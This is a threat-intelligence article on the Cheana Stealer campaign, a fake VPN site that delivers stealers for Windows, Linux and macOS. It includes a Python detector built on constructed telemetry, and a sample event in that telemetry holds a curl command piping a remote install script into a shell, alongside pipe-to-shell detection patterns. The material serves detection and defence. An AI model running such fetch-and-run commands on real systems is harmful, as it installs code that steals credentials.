Cybersecurity researchers have uncovered a phishing campaign that distributes the "Cheana Stealer" malware through a fake VPN download site. The campaign stands out because it targets users of Windows, Linux, and macOS rather than a single platform.
The Cheana Stealer campaign runs through a phishing site that impersonates a legitimate VPN provider, specifically mimicking the WarpVPN service. The site is built to lure visitors into downloading what appear to be VPN clients for their operating system. The attackers maintain a distinct version of Cheana Stealer for each OS, which widens the pool of potential victims considerably.
According to Cyble Research and Intelligence Lab (CRIL), Cheana Stealer uses a different delivery chain on each platform. For Windows users, the malware is delivered through a PowerShell script that runs a batch file named install.bat. The batch file first checks whether Python is present on the victim's system and, if not, installs Python along with pip and virtualenv. It then installs a malicious Python package named hclockify-win, which harvests data from cryptocurrency browser extensions and standalone wallets. The stolen data is compressed into a ZIP archive and sent to the attackers' command and control server, along with passwords extracted from the browser. Because the payload arrives as an ordinary pip package, the whole sequence looks much like routine developer tooling setup.
On Linux systems, Cheana Stealer is delivered via a curl command that downloads a script named install-linux.sh. This script retrieves a unique ID used to track the victim, then collects browser data, cryptocurrency wallet details, and SSH keys, which are exfiltrated to the attackers' server. For macOS users, the malware is delivered through a script called install.sh, which displays fake password prompts to capture the user's account credentials and then gathers browser login data, macOS passwords, and Keychain contents.
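The delivery chains above leave a recognisable trail in process and shell telemetry. The following detector is an added example written for this article; it is not code from the report, from Cyble/CRIL, or from the malware itself. It scans constructed command-line events for the indicators the report names (install.bat launched from PowerShell, a pip install of hclockify-win, install-linux.sh and install.sh) plus the generic "curl | sh" pattern, and reports which hosts show the complete Windows chain. The hostnames and the URL are placeholders, not infrastructure from the report.

```python
"""Heuristic detector for the Cheana Stealer delivery chain (added example, not the
article's or CRIL's code). Scans process-start events and flags the delivery
indicators named in the report; hostnames and URLs below are constructed."""
import re
from collections import defaultdict

# Constructed sample telemetry: one dict per process start event (hypothetical hosts).
SAMPLE_EVENTS = [
    {"host": "win-01", "parent": "explorer.exe",   "cmd": "powershell.exe -ExecutionPolicy Bypass -File setup.ps1"},
    {"host": "win-01", "parent": "powershell.exe", "cmd": "cmd.exe /c install.bat"},
    {"host": "win-01", "parent": "cmd.exe",        "cmd": "python.exe -m pip install hclockify-win"},
    {"host": "lnx-07", "parent": "bash",           "cmd": "curl -fsSL https://warp-vpn.example/install-linux.sh | sh"},
    {"host": "mac-03", "parent": "Terminal",       "cmd": "sh install.sh"},
    {"host": "dev-12", "parent": "bash",           "cmd": "python -m pip install requests"},
    {"host": "dev-12", "parent": "bash",           "cmd": "python -m venv .venv"},
]

MALICIOUS_PACKAGES = {"hclockify-win"}  # package name taken from the CRIL report

PIP_INSTALL = re.compile(r"\bpip3?\s+install\s+(?P<pkgs>.+)$")
# curl/wget output piped straight into sh or bash, optionally via sudo
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba)?sh\b")
# install.bat, install.sh or install-linux.sh as a standalone name (not e.g. reinstall.sh)
SCRIPT_NAME = re.compile(r"(?<![\w-])(?P<name>install(?:-linux)?\.(?:bat|sh))\b")


def classify(event):
    """Return (severity, code) for one event, or None when nothing matched."""
    cmd = event["cmd"]
    m = PIP_INSTALL.search(cmd)
    if m:
        pkgs = {p.lower() for p in m.group("pkgs").split() if not p.startswith("-")}
        if pkgs & MALICIOUS_PACKAGES:
            return ("high", "malicious_pip")
    m = SCRIPT_NAME.search(cmd)
    script = m.group("name") if m else None
    if PIPE_TO_SHELL.search(cmd):
        # Any remote script piped into a shell is worth a look; the named installer is worse.
        return ("high" if script else "medium", "remote_script_piped")
    if script == "install.bat" and event["parent"].lower() == "powershell.exe":
        return ("high", "installer_from_powershell")
    if script:
        return ("medium", "installer_script")
    return None


def scan(events):
    """Group (severity, code, command) hits by host."""
    by_host = defaultdict(list)
    for ev in events:
        hit = classify(ev)
        if hit:
            by_host[ev["host"]].append((hit[0], hit[1], ev["cmd"]))
    return dict(by_host)


# The Windows chain from the report: install.bat from PowerShell, then the malicious pip package.
WINDOWS_CHAIN = {"installer_from_powershell", "malicious_pip"}


def hosts_with_full_chain(events):
    """Hosts on which every stage of the Windows delivery chain was observed."""
    codes = defaultdict(set)
    for ev in events:
        hit = classify(ev)
        if hit:
            codes[ev["host"]].add(hit[1])
    return sorted(h for h, c in codes.items() if WINDOWS_CHAIN <= c)


if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS).items():
        for sev, code, cmd in hits:
            print(f"{host}: [{sev}] {code}: {cmd}")
    print("full Windows chain on:", hosts_with_full_chain(SAMPLE_EVENTS))
```

The per-event rules are deliberately loose (a remote script piped into a shell is common in legitimate setups), so the host-level chain check is what turns noisy single hits into an alert worth paging on. Extend MALICIOUS_PACKAGES and SCRIPT_NAME as further indicators are published rather than widening the generic patterns.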
The phishing site associated with the Cheana Stealer campaign is linked to a Telegram channel with over 54,000 subscribers. The channel has been active since at least 2018 and has changed operators several times; the phishing site was added to its bio in 2021. The channel initially offered what appeared to be free VPN services to build credibility, then switched to promoting the phishing site and distributing Cheana Stealer.
The campaign's strength lies in its social engineering rather than in any software exploit. The phishing site provides detailed, OS-specific installation instructions that walk the victim through running the installer themselves, so the disguised malware is executed with the user's own privileges and by the user's own hand. Per-OS payloads and the use of ordinary package and shell tooling let the stealer blend in while it collects data.
To reduce exposure to phishing campaigns of this kind, users and defenders should download software only from the vendor's official site or app store, treat any installer that pipes a remote script into a shell or asks for the account password in an unexpected prompt as suspect, raise awareness of phishing techniques, deploy endpoint protection capable of flagging the delivery chain described above, monitor network traffic for unexpected outbound uploads, enable Multi-Factor Authentication (MFA) so stolen passwords alone are not enough, and maintain a tested incident response plan. The breadth of the Cheana Stealer campaign underscores the need for vigilance and layered controls against evolving threats.

